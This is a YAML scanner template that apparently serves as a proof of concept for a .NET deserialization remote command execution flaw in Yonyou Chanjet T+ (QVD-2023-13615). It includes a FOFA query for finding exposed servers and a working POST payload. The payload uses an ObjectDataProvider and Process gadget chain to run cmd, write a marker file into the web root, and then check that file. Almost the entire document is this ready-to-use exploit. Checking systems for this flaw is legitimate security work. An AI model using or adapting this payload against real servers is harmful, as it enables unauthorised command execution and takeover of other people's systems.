product: 用友畅捷通-TPlus
vName: 用友畅捷通-TPlus GetStoreWarehouseByStore 远程命令执行
type: 命令执行
vID:
  - QVD-2023-13615
level: 3
vDesc: 用友畅捷通-TPlus GetStoreWarehouseByStore 存在 .net反序列化漏洞，导致远程命令执行，控制服务器
version: ''
note: ''
search:
  FOFA: app="畅捷通-TPlus" && product="畅捷通-TPlus"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17703915.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore
      header:
        X-Ajaxpro-Method: GetStoreWarehouseByStore
      json:
        storeID:
          MethodName: Start
          ObjectInstance:
            StartInfo:
              Arguments: /c echo 1433223 > C:/Progra~2/Chanjet/TPlusStd/WebSite/52e039302a62d077.txt
              FileName: cmd
              __type: System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0,
                Culture=neutral, PublicKeyToken=b77a5c561934e089
            __type: System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral,
              PublicKeyToken=b77a5c561934e089
          __type: System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0,
            Culture=neutral, PublicKeyToken=31bf3856ad364e35
    verify:
      path: /tplus/52e039302a62d077.txt
      logic: and
      check:
        - status: 200
          body:
            value:
              - 1433223
            logic: and